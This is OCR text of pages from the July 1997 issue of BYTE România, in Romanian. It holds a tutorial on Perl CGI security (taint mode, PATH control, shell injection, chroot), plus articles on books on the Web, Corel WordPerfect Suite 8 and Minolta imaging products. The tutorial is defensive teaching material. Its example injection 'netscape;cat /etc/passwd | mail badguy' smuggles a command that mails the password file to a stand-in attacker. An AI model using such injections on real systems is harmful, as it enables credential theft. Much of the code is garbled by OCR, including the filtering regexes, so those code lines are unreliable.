execuţiei foarte rapide a acestora.
La baza programării stau unelte ca C, sed,
awk şi sh, deci cunoașterea acestora ajută
mult la învățarea limbajului Perl.
În Perl, munca programatorului este
limitată doar de capacitățile hardware ale
calculatorului. Un întreg fişier poate fi
citit într-o singură variabilă de tip string
(dacă avem suficientă memorie). Putem
apela funcţii recursive de orice adâncime
(dacă avem răbdare şi memorie). Totodată,
Perl are un mecanism foarte eficient de
căutare și înlocuire într-un text după un
model dat (iniţial era conceput pentru
prelucrarea fişierelor de tip text, aşa cum
arată şi numele lui Practical Extraction and
Report Language).
De la versiunea $ putem folosi deja pro-
gramarea modulară şi programarea orien-
tată object. În Perl programele setuid sunt
mult mai sigure decât în C datorită unui
mecanism care urmăreşte evoluţia datelor,
acesta putând fi activat cu ajutorul para-
metrului -T în linia de comandă. Astfel,
apeluri de sistem care necesită o securitate
mare nu vor fi executate, dacă se bazează
pe informaţii primite de a utilizator.
Cu ajutorul acestui limbaj se pot scrie
foarte uşor programe CGI (Common Gate
Interface), ale căror rezultate de obicei apar
într-o pagina WWW, singurul lucru la care
trebuie să avem mare atenţie este securi-
tatea sistemului nostru, adică serverul pe
care vor rula aceste programe.
Mediul.
Ca şi în alte programe, şi în Perl mediul în
care rulează un program CGI poate fi con-
trolat într-o mare măsură. Iniţial acest me-
diu este setat de către serverul Web, care
poate fi același cu mediul serverului sau mo-
dificat doar pentru programe CGI (aceas-
ta depinde de serverul pe care-l folosim).
Mediul în care rulează un program CGI,
poate să schimbe comportamentul pro-
gramului şi rezultatele lui.
De exemplu, variabila de mediu PATH
este folosită de un program CGI pentru a
căuta alte aplicaţii care sunt lansate din
cadrul programului CGI. Dacă variabila
PATH era setată la /bin:/usr/bin:/usr/local
/bin, şi a fost lansat programul /s, atunci pro-
gramul va fi căutat în aceste trei directoare.
Se aşteptă ca programul s să fie găsit (/bin/Is
pe cele mai multe sisteme de operare
UNIX).
Dacă variabila PATH ar fi fost setată la
/tmp:/bin:/usr/bin (de către server sau de
programator), iar Larry Stan putea să
lucreze la un proiect oarecare pe acelaşi sis-
tem, creând un script temporar numit
/tmp/ls (după inițialele lui), când progra-
mul CGI caută şi lansează comanda Is în loc
de /bin/Is va rula /tmp/ls care va avea desi-
gur alte rezultate decât cele la care ne-am
fi aşteptat.
„Pentru obținerea unui rezultat
există mai multe căi“
Controlul mediului în Perl
Ca să schimbăm o variabilă de mediu in
Perl, trebuie să manipulăm un tablou aso-
ciativ: %ENV. Variabilele de mediu deja
existente în UNIX și pe care am dori să le
schimbăm sunt PATH, IPS şi SHELL.
După cum am menţionat în rândurile
precedente, majoritatea serverelor vor seta
o serie de variabile de mediu ca programul
CGI să le folosească. Acestea includ (la
fiecare server poate fi diferit):
AUTH_TYPE, CONTENT_LENGHT,
DOCUMENT. ROOT, HTIP_CON-
NECTION, HTIP_HOST,
HTTP_USER_AGENT, PATH,
QUERY STRING, REMOTE_ADDR,
REMOTE HOST, REMOTE_USER,
REQUEST_METHOD,
SERVER_ADMIN, SERVER_NAME,
SERVER ROOT si SERVER_PROTO-
GOL:
Ca să aflăm valoarea unei variabile,
HTTP_USER_AGENT, de exemplu, pro-
gramul trebuie doar să facă o referire cu
cheia respectivă in tabloul asociativ. De
exemplu:
felix) cat /var/httpd/cgi -
bin/get-browser.bad
JE! /bin/perl
$browser =
$ENV{ ‘HTTP_USER_AGENT '};
Acum, variabila $browser este gata
pentru prelucrare. Este bine de reţinut ca
tipul browserului este setat însăşi de brow-
ser, şi de aceea nu este înțelept să-l folosim
orbeşte într-un script. Este înțelept ca
înainte să-l salvăm într-un fişier „log“ sau
să-l dăm ca parametru într-un apel de sis-
IULIE 1997 BYTE Romania 79
Web Master
Programarea CGI
tem, să ne uităm dacă nu conţine caractere
nedorite sau neaşteptate. De exemplu:
felix> cat /var/httpd/cgi-
bin/get-browser.good
#!/bin/per]
$browser =
SENV{ 'HTTP_USER_AGENT'};
die if ($browser =~
LAMA ANS Ne UNGHD LARVA
VEIN FAS]
die if (strlen($browser)>200);
În cazul în care nu doriţi ca execuţia pro-
gramului să se termine imediat dacă una
dintre cele două condiţii a fost adevărată,
va trebui să luaţi măsuri de precauţie înainte
să manipulaţi sau să folosiţi variabila
$browser. Prima linie determină dacă unul
dintre caracterele speciale de shell se află în
definiţie. Unele browsere legale folosesc.
aceste caractere, dar noi vrem să filtrăm,
să se termine imediat, dacă unul dintre vari-
abila $browser într-un apel de sistem în
siguranță.
A doua linie detecteaza dacă definiția
browserului nu este suspicios de lungă.
Două sute de caractere fiind mai mult decât
necesare pentru definirea unui browser, tot
ceea ce este mai lung decât aceasta poate
indica o exploatarea unui punct slab într-un
server (dacă există).
Variabila de mediu PATH
O recapitulare foarte rapidă: Variabila de
mediu PATH determină unde să caute pro-
gramele locul aplicaţiilor pe care trebuie să
le execute. Controlul acestei variabile este
exact același cu cel descris înainte, deoarece
este doar o altă variabilă de mediu in Perl:
felix> cat /var/httpd/cgi-
bin/path-set.basic
#!/bin/perl
SENV{'PATH'} =
'/bin:/usr/bin:/usr/ete”:;
Folosiţi cu precauţie! Dacă programul
setează variabila PATH bazată pe date
introduse de utilizator, închipuiţi-vă ce s-
ar putea întămpla:
felix> cat /var/httpd/cgi-
bin/path-set
#!/bin/per15
use CGI;
SENV{'PATH'} = $query-
>param('path-input');
system('1s','/opt/httpd/pro
80 BYTE România. IULIE 1997
files/internal');
Pentru acest program am folosit un mo-
dul de programare CGI.pm foarte util pen-
tru scrierea programelor CGI. Linia a 2-a
specifică interpretorului Perl să încarce
acest modul. Linia a 3-a setează variabila de
mediu PATH la valoarea variabilei numită
path-input. Acestă variabilă path-input este
numită în formularul aflat în fişierul HTML
din care este apelat programul nostru path-
set. Linia a 4-a lansează programul Is.
Dacă în formularul HTML utilizatorul
introduce /bin:/usr/bin:/usr/etc progra-
mul va functiona dupa cum ne-am asteptat
(/bin/Is este executat si rezultatul este tri-
mis browserului). Dacă un utilizator intro-
duce /tmp:/bin:/usr/bin, atunci comporta-
mentul programului poate fi schimbat din
nou de către Larry Stan şi programul lui
/tmp/ls. Închipuiţi-vă dacă programul doar
şterge fişierele primite ca parametru!
La proiectarea programului am greşit
fiindcă am avut încredere în datele intro-
duse de utilizator. Programul trebuie să aibă
variabila PATH fixată şi este bine să nu
schimbăm variabilele de mediu folosind
date primite de a utilizator.
Apeluri de sistem în Perl
În Perl putem avea apelurile de sistem în
diferite forme, ori apelând functia „sys-
tem“, sau folosim semnele '' între care pu-
nem numele programului pe care dorim
să-l executăm sau executăm un apel open.
#!/bin/perl
SENV{'PATH'} =
'/bin:/usr/bin:/usr/etc:/usr/]
ocal/bin';
$browser =
$ENV{'HTTP_USER_AGENT"};
system("record_type $browser");
sau
#!/bin/perl
SENV{'PATH'} =
'/bin:/usr/bin:/usr/etc:/usr/]
ocal/bin';
$browser =
SENV{'HTTP_USER_AGENT'};
‘record_type $browser';
sau
#!/bin/per|
$ENV{'PATH'} =
'/bin:/usr/bin:/usr/etc:/usr/]
ocal/bin';
$browser =
SENV{ "HTTP_USER_AGENT '};
open(P_RECORD, "record_type
$browser|") || die;
Daca browserul nu ar fi fost un browser
adevărat, doar un program care încearcă să
atace serverul nostru de Web, putea să
definească variabila HTTP_USER_A-
GENT ca netscape;cat /etc/passwd | mail
badguy. Apelurile de sistem prezentate
anterior vor lansa o comandă shell date
fiind ca parametru programele. În exem-
plul nostru, comanda finală care a fost exe-
cutată sub UNIX a fost
/bin/sh-c record_type netscape;
cat /etc/passwd | mail badguy
Ops! Deoarece ; este un separator de
comenzi în Bourne shell, lansăm mai multe
comenzi decât am vrut iniţial. Partea înspăi-
mântătoare în această situaţie este că am
primit tipul browserului (care pare să fie
în ordine), dar în același timp, fără să ştim,
am trimis fişierul cu parole unui posibil
hacker.
O metodă mai sigură în Perl este
#!/bin/perl
$ENV{'PATH'} =
'/bin:/usr/bin:/usr/etc:/usr/]
ocal/bin';
$browser =
SENV{ 'HTTP_USER_AGENT'};
system("record_type", "$brows
ep)
În acest caz, apelul de sistem din Perl va
face o combinaţie de fork/exec, şi în acest
fel ; nu mai este un separator de comenzi.
Programul ar memora ca tip the browser
netscape; cat /etc/passwd | mail badguy
(care ar fi un semn de alarmă dacă îl obser-
văm în fişierul „log“), dar niciodată nu ar
trimite fişierul cu parole la persoane dubi-
oase.
chroot si chdir in Perl
In C aveam două apeluri de sistem, chroot
sichdir. $iin Perl putem gasi aceste apeluri,
iar scopul lor este de a restrânge „imaginea“
sistemului de fişiere pe care poate să-l vadă
un program aflat în execuţie.
felix> cat /var/httpd/cgi-
bin/count-password.bad
#!/bin/pert
Programarea CGI | Web Master
open(F_PASSWD,'/etc/passwd') | | nou fişierul cu parole. $ENV{ "HTTP_USER_AGENT" } =~
die; Interpretorul lansat diferit, inainte sa /*(\wt)$/;
while () {
$I++;
)
$ret =
chroot('/local/frame/root');
die if ($ret ==1);
$ret = chdi peeves:
die if ($ret ==1);
Acest program are o eroare de pro-
iectare. Deschide fişierul passwd şi îl lasă
deschis (nu există un apel close). După
chroot, programul tot are dreptul la fişierul
passwd. In loc de acesta ar fi trebuit să
scriem
felix> cat /var/httpd/cgi-
bin/count-password.good
JE! /bin/perl
open(F_PASSWD,'/etc/passwd') |
die;
while () |
Se
)
close(F_PASSWD) ;
$ret =
chroot('/local/frame/root');
die if ($ret ==1);
$ret = chdir('/');
die if ($ret ==1);
Variabile sigure in Perl
Perl -ul este constient de unde au provenit
datele, ce variabile au fost setate inainte de
a fi verificate si unde foloseste programa-
torul aceste date. Dacă o variabilă este seta-
tă dinamic, luând o valoare de la linia de
comandă, dintr-un fişier, sau ia valoarea
unei variabile de mediu pe care programa-
torul nu l-a specificat iniţial, atunci vari-
abila este considerată tainted, adică nesigu-
ră. De exemplu,
felix> cat /var/httpd/cgi-
bin/record-type.bad
#1 /bin/perl
"record_type
$SENV{ ‘HTTP_USER_AGENT '}';
Interpretorul specificat in prima linie
(/bin/perl) nu va tine cont daca dam date
periculoase unui shell. În acest caz, variabila
de mediu HTTP_USER_AGENT, care vine
de la utilizator si nu este de incredere, poate
să fie prietenul nostru netscape; cat
/etclpasswd | mail badguy şi ar trimite din
lanseze record_type ar fi spus „Hey! Nu
te-ai uitat la variabila periculoasă care
provine de la browser înainte ca să-l dai ca
parametru unui apel de sistem care lansează
un shell. Ce se întâmplă dacă introduce ceva
neaşteptat? Nu las ca acesta să se întâmle,
opresc execuţia programului.“ Acest script
ar arăta astfel
Perl 4
felix> cat /var/httpd/cgi-
bin/record-type.taintper!4
IF! /bin/taintper!
"record_type
ȘENV("'HTTP_USER_AGENT!')";
sau
Perl5
felix> cat /var/httpd/cgi-
bin/record-type.bad
#!/bin/perl5 -T
"record_type
$ENV{'HTTP_USER_AGENT'}';
si ar opri executia la linia a doua, neru-
land niciodata programul record_type.
Acesta este foarte util când scriem pro-
grame CGI, deoarece programul se va opri
înainte ca pericolul să înceapă.
Desigur, vrem ca programul să ruleze în
siguranță după cum am conceput iniţial. Ce
trebuie modificat? Mai jos este prezentat
acelaşi program în Perl 4 şi Perl 5, unde mai
întâi ne uităm dacă variabila de mediu
HTTP_USER_AGENT contine ceva peri-
culos.
Perl 4
felix> cat /var/httpd/cgi -
bin/record-
type. taintperl4.good
#!/bin/taintperl
SENV{'PATH'} = '/bin:/usr/bin' ;
SENVI TES Ss
($untainted) =
$ENV{'HTTP_USER_AGENT' } =~
7 °O\WEY ELS
'record_type $untainted':
sau
Perl5
felix> cat /var/httpd/cgi -
bin/record-type.bad
IF! /bin/perl5 -T
SENV{'PATH'} = '/bin:/usr/bin';
SENVCUCERS Sy
($untainted) =
‘'record_type $untainted';
În linia a 4-a, ne uităm dacă variabila de
mediu conţine doar litere, și în acest caz
variabila $untainted va lua valoarea aces-
tuia. Perl, ca de obicei, urmăreşte această
variabilă, îl marchează „untainted“ (curat),
şi când va fi folosită în apelul record_type,
Perl nu va mai opri execuţia.
Mai multe informații
Pentru simplificarea implementării scrip-
turilor CGI în Perl 4 și Perl 5 există nişte
biblioteci pe care le putem folosi. Modu-
lul Perl CGI.pm, poate fi obţinut de la
ftp://ftp-genome.wi.mit.edu/pub/soft-
ware/WWW/. Exista si un modul Perl 5
care abstarctizează procesul de primire date
dintr-un formular gi trimitere de date intr-o
pagină Web. Perl 4 şi care are un pachet
numit cgi-lib.pl, care poate fi obținut de la
http://www.bio.cam.ac.uk/cgi-lib.
Péter Csaba este student la Universitatea
Petru Maior din Tg. Mures si Webmaster
pentru situl www.uttgm.ro. Poate fi con-
tactat la: cpeter@uttgm.ro
AUTOMEX
Your best
MULTIMEDI
partner
IULIE 1997 BYTE România 81
Januageydiy
ELLE
i
Piet se Ree:
er
ej eneajay
nguad apaday
leyy ajeg ase eunuj
O veche zicală spunea că „cine are carte, are parte.
Să vedem cum stau lucrurile, din acest punct de vedere, pe Web.
Cărți pe Web
acă căutaţi o documentaţie, pentru aproape orice
subiect imaginabil, atunci cel mai potrivit loc pentru
a începe este, fără îndoială, Internetul. De obicei, o
documentaţie găsită pe Internet este cu atât mai plauz-
ibilă cu cât ea este luată dintr-o sursă care are un „spate“ solid, fie
este semnată de personalități ale lumii informaticii. Printre docu-
mentaţii cele mai serioase par a fi cărţile, cu care am fost obişnuiţi
începând încă din şcoala primară.
La drum prin România
Pornind de la aceste premise, am început să navighez pe Web în
căutarea unor cărţi de informatică, fără a avea un anumit subiect
în minte. După cum era firesc, mi-am îndreptat mai întâi atenția
spre site-urile editurilor româneşti, ce editează cărți de informati-
că. Nu mare mi-a fost mirarea când, edituri precum Editura Teo-
ra, ce editează cel mai mare număr de cărţi de informatică în lim-
ba română, nu au sit pe Web. Cărţile ei, în schimb, pot fi găsite de
vânzare prin intermediul magazinelor Web ale altor companii cum
este şi NordEst Communication S.A. (http:/Avww.nordest.ro).
[Tir rea
Go Bookmer 0
Sie
The Knowledge Revolution Continues...
[ia 20207) Monctay, June Ş0, 1987
Dummleswear™ is Here.. Exclusively! b Search Books or Ste &
AȘ Look smart in For Dummies® shirts and hats -- Taia Bess :
even point and click smart on.a one-ofackind mouse Ne
pad. It's brand new. It's Dummieswearl Fae ;
m Order..For Dummiles Books Online!
P General Interest
%% Now you have no exouse not to own a ..For > Family Series
Dummies book -- just buy as you browse the site. b New Titles
When you order two or more books there is no uzi Shopping
charge for normal shipping, | x
Dummieswear, Books,
we New ..For Dummies® Titles, Including: © SDs and moret
™® » MORE Intemet For Dummies®, 3rd Edition rocii Ls
” For Dummies® 2
Nutrition For > Browse Chapters
Software
Revolutia cunoasterii continua
Deviind putin de la firul textului nostru, ţin să precizez pentru
cei care şi-au achiziţionat cărți din seria „...pentru Tonţi“, sau sunt
pe cale de a le achiziţiona, să viziteze situl http://www.dummies
„com, unde „revoluţia cunoașterii continuă“. Aici puteți găsi pe
lângă tradiţionalele oferte de vânzare, atât informaţii supli-
mentare privitoare la cărțile din serie, cât şi recenzii şi capitole date
ca şi exemplu. M-am bucurat totuși atunci când, la CCC Iași,
(http://www.cccis.ro) am găsit două cursuri în limba română,
adresate studenților: „Curs de iniţiere în HTML“ ce cuprinde de
www.agora.ro/byte/
de Crystian Matei
la informaţii generale despre WWW şi până la imagini senzitive,
tabele şi editoare HTML şi „Curs de iniţiere în utilizarea resurselor
Internet“, ozientat spre serviciile oferite de Telnet, FTP, E-Mail
etc. Asemenea cursuri-pot fi găsite și pe la universităţile din
România, multe dintre ele fiind încă în construcţie sau în faza de
proiect. Şi, nu în ultimul rând, există cărțile editate de Computer
Press Agora si cele comercializate de CPA la http://www.agora.ro.
Macmillan Computer Publishing
Cu părere de rau, am fost nevoit să părăsesc plaiurile natale şi să
mă îndrept spre cea mai mare editură ce publică cărți de informatică
din Statele Unite, şi nu numai, Macmillan Computer Publishing
PETE:
N PUBLISHING USA.
The 41 Reference Publisher on the internet
By Susan Ireland
This step-by-step guide features resume templates for
=] various industries, networ king strategies, and resume
i Hine
Macmillan Computer Publishing
(http://www.mcp.com). MCP aluat nastere in anul 1984, in Indi-
anapolis, sub numele de Corporatia Que, primind denumirea actu-
ală în anul 1984. Prima carte publicata se referea la utilizarea cal-
culatoarelor, iar cel mai mare succes l-a înregistrat cu cartea „Using
1-2-3“, care s-a vandut in peste un milion de exemplare.
Astăzi, MCP este format dintr-un conglomerat de edituri (Adobe
Press, BrandyGAMES, Hyden Books, Lycos Press, New Riders
Publishing, Que, Que Education & Training, Sams Publishing,
sams.net, Waite Group Press si Ziff-Davis Press) fiecare devenind,
la randul ei, un nume important in editarea de carte de informati-
că. Toate acestea şi-au reunit forțele pentru a scoate serii de cărți
precum Adobe Design Essentials, PC Learning Labs, Teach Your-
self, Complete Idiot's Guide etc., ce nu pot sa lipseasca din biblioteca
proprie. Multe dintre cărțile MCP pot fi cumpărate și prin editu-
ra Computer Press Agora.
Cititorilor în limba franceză le recomand să acceseze adresa
JULIE 1997 BYTE Romania 83
*
Surfing | Carti pe Web
http://www.ssm.fr de la editura Simon & Schuster Macmillan.
Daca aveti instalat programul PointCast, care este capabil sa
primeasca informatii furnizate pe Web prin tehnologia push, a-
tunci veți putea primi şi informaţii de ultimă oră de la MCP, prin
serviciul PointCast Connection. Pentru cei interesaţi în publicis-
tică, la situl MCP pot găsi chiar şi locuri de muncă (manageri, edi-
tori, graficieni ş.a.m.d).
Que's Digital Bookshelf
La editura MCP a fost şi primul loc în care am găsit cărți online,
la adresa http:/Awww.mep.com/que/bookshelf, asociată editurii
Que's Digital Bookshelf. In clipa in care am accesat situl, existau
două cărți noi apărute: „The Complete Idiot's Guide to Java Script“
Şi „Working with Active Server Pages“.
Alte 38 de titluri erau disponibile la categoriile World Wide
Web, Web Publishing, WWW Programming, WWW Servers, Pro-
gramming, Newtworking, Database Programming, BackOffice,
GroupWare si Business Aplication.
Sams Publishing
O altă editură, ce oferă cărţi online, din cadrul MCP, este şi Sams
Publishing & sams.net (http://www.mcp.com/sams). De data
aceasta însă, trebuie să vă grăbiţi să citiți cărțile oferite, pentru că
„un titlu nu stă mai mult de 45 de zile (trial period) pe sit. Printre
categoriile la care exitau cărți, la data accesării sitului, se
numărau și Internet, Internet Networking /Servers, Internet Pro-
gramming, Internet Web Publishing si Internet Systems. Unele din-
tre cărțile publicate pe Web au anumite capitole sub parolă.
Pe lângă cartea „Teach Yourself HTML in 24 Hours“, situl Sams
vă oferă o cafenea HTML, deschisă 24 de ore din 24, ce cuprinde,
pe lângă exemplele din carte, şi referințe pentru principalele
Fie feeteres te ents dense oot
SERPS: UP + FSSSUERES: Ad PR AIDES:
Try dhe serie Refers pet past then te wack:
#!| TUCOWS!
The ultimate collection of internet related software,
«TUCOWS. gets better and bigger. Gigabytes of freeware
and! shareware is row avaiable for downloading. Five: The
marcaje utilizate de limbajul HTML si modul efectiv in care a fost
construită cafeneaua, construcţie foarte utilă pentru cei ce vor să-
şi construiască o pagină Web performantă.
Situl Sams ne mai oferă şi o oglindire a arhivei software; Tucows
Winsock, extrem de utilă pentru dezvoltatorii de software.
Prentice Hall Direct
Pe lângă cărţile publicate, în mod obișnuit, la tipografie, Prentice
Hall Direct, o diviziune a editurii Simon & Schuster Macmillan, ne
mai oferă 400 de titluri prin e-mail. La multe dintre aceste cărți,
editura le-a pus pe Web cuprinsul împreună cu câteva capitole.
Cărțile pot fi studiate înainte de a face plata efectivă, timp de 30 de
84 BYTE România -IULIE 1997
zile.
Situl editurii (http:/Awww.mep.com/phdirect) ne oferă şi posi-
bilitatea de a ne înscrie într-o listă, prin intermediul căreia vom fi
anunțați la apariţia unor titluri noi.
Alți distribuitori de cărți pe Web
Editura Manning Publications ne oferă cărțile sale prin intermediul
Browser's Book Corner (http://www.browsebook.com). Aici puteti
gasi descrieri detailate si introducerile cartilor puse in vanzare prin .
intermediul CyberBooks (http://www.browsebooks.com/cyber-
books/), ce ne pune la dispoziţie şi versiuni HTML ale cărţilor
tipărite. Acestea au avantajul că sunt cu mult mai ieftine şi conţin
toată grafica aflată și în cărți. :
Amazon.com (http://www.amazon.com) se laudă că este cel mai
a
SEARCH OY = 4
Sa | Weloome'te Earth's nest resource for a
areas information about computer- and Internet-related |. |
Room
Computer & Internet
Emre ica
| ials ean fox thas fast
| Tie Author's Vaice ae ea a
E e esa Sve ue eto ec rr cad IE RNa oer
Amazon.com
mare distribuitor de cărţi prin intermediul Web-ului. Cu un pret
cu 20-40 % mai ieftin, puteţi găsi aici peste 400000 de titluri, zi şi
noapte. La cerere, editorii de la Amazon.com vă pot trimite, prin
e-mail, mai multe date despre cărțile puse în vânzare.
Alte cărți pe Web
Mai puteţi găsi şi alte cărți pe Web, independente, la urmă-
toarele adrese:
http://java.sun.com/hotjava.html (,,HotJava browser & Java
Language: Documentation“);
http://www.javasoft.com/java.sun.com/HotJava/UsersGuide/u-
sers.html (,,Using HotJava: Ghidul utilizatorului HotJava“);
http://sunsite.unc.edu/mdw/Linuxdoc-SGML.html (,,Linux-
doc-SGML User's Guide“)
http://www.yahoo.com/Computers_and_Internet/Internet/Info
rmation_and_Documentation/Beginner_s Guides/ (,,Yahoo:
Internet Beginner's Guides‘).
Concluzii
Mi-am încheiat aici incursiunea pe Web. Ceea ce am observat însă
este discrepanța dintre multitudinea de titluri ce pot fi cumpărate
de la magazinele de pe Web şi zgârcenia cu care sunt puse textele
propriu-zise în format HTML.
Mai multe documentaţii pot fi găsite, în schimb, în documente
mai mici și mai specializate pe anumite domenii stricte. BI
Cristian-Matei Eugen este redactor colaborator al revistelor BYIE Roma-
nia si PC Report. Poate fi contactat prin intermediul redacţiei sau via
e-mail la cmatei@agora.ro
_ SUDINTERNET Craiova 051 417963
“TOPIECH. = : Devă 054 213871 |
REMUS ROMÂNIA Piatra-Neamt033 213333
_INTER-CONEXION Pitești 048 219267 |.
"HARD-TEST'94 Tulcea 040 521871
Baia Mare „06 2
“Dene cence Bras.
. RomaniaOnLine
_HARD-TEST'94 Brăila
Braşov 068 321529
039 639533
GMB : Constanţa 041619222
HARD-TEST'94 Galaţi. 036 467752
COMP-ARG Pitești 048214269}
COMPUTER STARS Pitești 048 215099 |.
TRANSDATA Ploiești 044 115577 |
IVEX |. ':RmMâlcea 050 736077 Și
MIANA | Rm.Vâlcea 050 724404 |
COSYs Sf.Gheorghe 067 323036 |
LANCOMP Sibiu 069 214103 |
WARP-NET Suceava 030226810 a
ROMWEST „Târgoviște 045 218343 oe oh
BIMOS Todi 052 210744 ‘Telnet/FIP
Email: office@starnets. ro
http://www starnets ro. :
Inter
@ Powered by SPARC- -Solaris
Ultima suită WordPerfect oferă performanțe de viteză
mai bune si o mai bună integrare. De Stan Miastkowski
O suită aproape perfectă a firmei Corel
atăl meu a condus mașini Chev-
rolet, unchiul meu a condus ma-
şini Ford, iar excentrica mea
ai mătușă necăsătorită a condus
un Austin. Între aceste fapte şi suitele soft nu
există diferență mare; utilizatorii au tendin-
ţa să dezvolte propriile accesorii. Cu Office,
firma Microsoft a continuat să acapareze o
mare parte din piaţa suitelor, dar SmartSuite
a fimei Lotus își păstrează poziţia, iar Corel
rămâne activ. Cu versiunea WordPerfect
Suite 8, adevărata noutate este cât de mult
face Corel pentru integrarea componentelor
şi sprijinirea performanţelor.
Am aruncat o privire asupra unei versi-
uni beta, cu noile versiuni de WordPerfect,
Quattro Pro, Presentations, Envoy si alte
appleturi utile. Noutatea adusă este Barista,
o aplicaţie care creează pagini Web din
documente generate de suită, prezentări şi
paginile de calcul tabelar.
Spre sfârşitul anului, utilizatorii vor putea
descărca Corel Central, ca replică la Out-
look-ul lui Office 97. Corel Central va con-
tine un calendar, un planificator, liste pen-
tru activitățile ce trebuie făcute, o agendă
de adrese, înregistrarea întâlnirilor şi un fişier
pentru cărți de vizită. EI se va integra cu
Netscape Communicator.
Sustinatorilor lui WordPerfect le va pla-
cea mai mult WordPerfect Suite 8. Interfata
de bază le-a rămas cunoscută, iar formatele
fişierelor din pachet nu s-au schimbat. Corel
s-a concentrat asupra câtorva extensii utile.
RETIN IER
TEHNOLOGIE x KK
IMPLEMENTARE kk kk
PERFORMANTA kk kkk
Deexemplu, WordPerfect are acum un strat
pentru desenare care permite suprapunerea
textelor peste obiectele grafice. Caracteris-
ticile tabelare sunt ușor de utilizat. Word-
Perfect oferă acum suport SGML (Stan-
dard Generalized Markup Language), un
standard internaţional folosit de multe firme
şi agenții guvernamentale.
Alte componente oferă o partajare cinsti-
86 BYTE România IULIE 1997
CorelCENTRAL - Untitled
Be o
; ‘this sofware
|| Date: Tue, 6 May 1987 21-08:40-0700
| From: Captam «taptamdomata cor»
| te “Quinton Lather?
| Please evaluate the following:
HH Tranks,
competitive upgrade,
$179 (requires a 486
and Windows 95 or NT;
16 MB of RAMis
recommended)
Corel Corp.
Ottawa, Ontario, Canada
613-728-8200
fax: 613-761-9176
http://www
.wordperfect.com
Enter 976
on Inquiry Card.
Noul Corel Central ce se integreaza cu Netscape Communicator va fi
o componentă importantă pentru WordPerfect Suite 8.
tă a noilor caracteristici. În Quattro Pro se
remarcă QuickCell, o caracteristică ce per-
mite evidența modificărilor din câmpurile
importante, cum este schimbarea valorilor
în întreaga pagină de calcul tabelar. Pre-
sentations poate împacheta imaginile de pre-
zentare, în scopul distribuţiei pe discuri flop-
py sau prin posta electronica. Toate
aplicatiile au functionalitati Web extinse,
oferind suport HTML si Java.
Primele versiuni ale suitei WordPerfectau
arătat rezultatele slabe obţinute prin cârpirea
unui grup de aplicaţii separate într-o singură
aplicaţie, dar Corel a eliminat aceste nea-
junsuri. Firma a făcut un lucru bun prin
realizarea unui pachet integrat, păstrând
particularitățile fiecărei componente.
PerfectExpert-o nouă suită interactivă şi
cu un sistem de asistență orientat pe activi-
tăți, permite interogări într-un limbaj clar şi
face apel intens la „vrăjitori“. Şi nu veţi găsi
aici acele caractere nostime care, în Office
97, dansează pe ecran. PerfectExpert nu e
AAA AA Excepţional
pentru joacă.
Chiar în această versiune, s-a observat că
aplicaţiile rulau mai rapid decât în primele
versiuni, Corel cheltuind mult timp pentru
optimizarea codului. Iar utilizarea intensă a
codului partajat de-a lungul suitei înseamnă
că versiunea ce va fi pusă în circulaţie, va avea
nevoie de mai puţin spaţiu pe disc decât
versiunea 7. Acest lucru este exact opusul
tendinței actuale a altor produse. O altă nou-
tate: suportul pentru tehnologia MMX.
Spre sfârşitul acestui an, firma Corel va
lansa o nouă versiune „profesională“ a sui-
tei WordPerfect, mai potrivită utilizatorilor
ce lucrează în reţea. Aceasta va integra
vechile versiuni Paradox şi Corel Time Line,
Corel Central, o nouă aplicație numită Web.
Sitebuilder, precum și alte lucruri utile.
Stan Miastkowski este consulting editor la
BYTE. II puteti contacta la stanm@bix.com.
[din BYTE, o publicatie McGraw-Hill, Inc.
Adaptare - Mircea Sabău]
AAA A Foarte Bine Ax Bine AX Acceptabil
A Slab
Prelucrare de imagini
Minolta oferă o cameră foto digitală performantă şi un ansamblu
de copiere-listare color destinată profesioniştilor.
Produse Minolta
pentru prelucrare de imagini
aca va ocupați cu alcătuirea
unor cataloage de produse,
crearea unor reclame, docu-
mentarea unor evenimente
pentru ziare şi reviste, lucrări de grafică pro-
fesională etc. cu siguranță doriţi să alegeţi
o soluţie completă de fotografiere digitală
şi imprimare în culori de calitate.
Noul sistemul unitar de achiziție şi tipă-
rire a informaţiei color oferit de Minolta
asigură toate necesităţile legate de prelu-
crarea de calitate a informaţiei color şi,
datorită calităților globale foarte bune, se
bucură deja de un mare succes în mediile
profesionale străine. Imaginile preluate prin
aparatul foto digital Minolta RD-175 cu
înaltă rezoluţie sau prin scanerul de film
QuickScan sunt trimise pentru prelucrare
unui computer PC sau Mac dotat cu softul
de prelucrare adecvat. Documentele rezul-
tate sunt tipărite color la o calitate foarte
bună pe imprimanta-copiator color Minol-
ta CF900. Acesta poate fi cuplat la un ser-
ver de imprimare performant din seria EFI
Fiery, care îl transformă într-o imprimantă
laser de grup multifuncţională, de format
A3, pregătită pentru listarea la viteză ridi-
cată a unor volume mari de documente.
Tipăririle color și multiplicările se fac la o
calitate profesională, și pentru serii mici de
lucrări rezultă un cost redus per pagină.
Nu este necesară achiziţionarea liniei
complete de prelucrare color. Compo-
nentele acestui sistem unitar pot funcționa
şi separat, și se împacă bine cu echipamente
specifice de care dispuneti.
Aparat foto digital RD-:75
Această cameră de luat vederi SLR (reflex
mono-obiectiv) este foarte apreciată de speci-
alişti, şi se situează în categoria aparatelor
digitale profesionale de sub 5.000 dolari (fără
obiectiv). Este foarte uşor de folosit, are o
mare autonomie în lucru și poate stoca com-
primat până la 114 imagini digitale de înal-
tă rezoluţie. Ca aparat digital are avantajul
că pozele selectate pot fi transferate direct pe
calculator pentru o eventuală prelucrare, sau
prin modem pot fi trimise la distanţă. „Peli-
cula“ nu necesită nici procesarea chimică,
www.agora.ro/byte/
de Viktor Veres
Minolta Romania srl
sos. Oltenitel
i ae Lee
Bucuresti 79656
(01)-634.62.45
330.70.02
O cameră foto digitală profesională
imaginile capturate sunt digitizate imediat și
sunt memorate pe suport magnetic.
Blitzul automat încorporat, sistemul com-
plex de senzori precum și obiectivul de ca-
litate permite lucrul în condiţii de iluminare
extreme. Temperatura de culoare optimă
este de 3200-5500 grade K, senzorii având
o corecție suplimentară pentru spectrul per-
ceput de ochiul uman. Are o sensibilitate
foarte mare - ISO 800 (30 DIN) -, iar tim-
pul de expunere variază între 1/2...1/2000
secunde. Poate lucra în modul manual sau
automat, reglând continuu distanţa și
parametrii de expunere (deschiderea şi
durata). La această cameră foto se potrivesc
toate obiectivele Minolta din seria AF cu
închizător baionetă, cu distanţa focală de
la 16 mm la 600 mm și adaptoare pentru
fotografiere de la mică distanță (macro).
Pentru a elimina efectul de ochi roşii
datorat reflectării parţiale a luminii blitz-
ului din interiorul ochiului subiectului, ful-
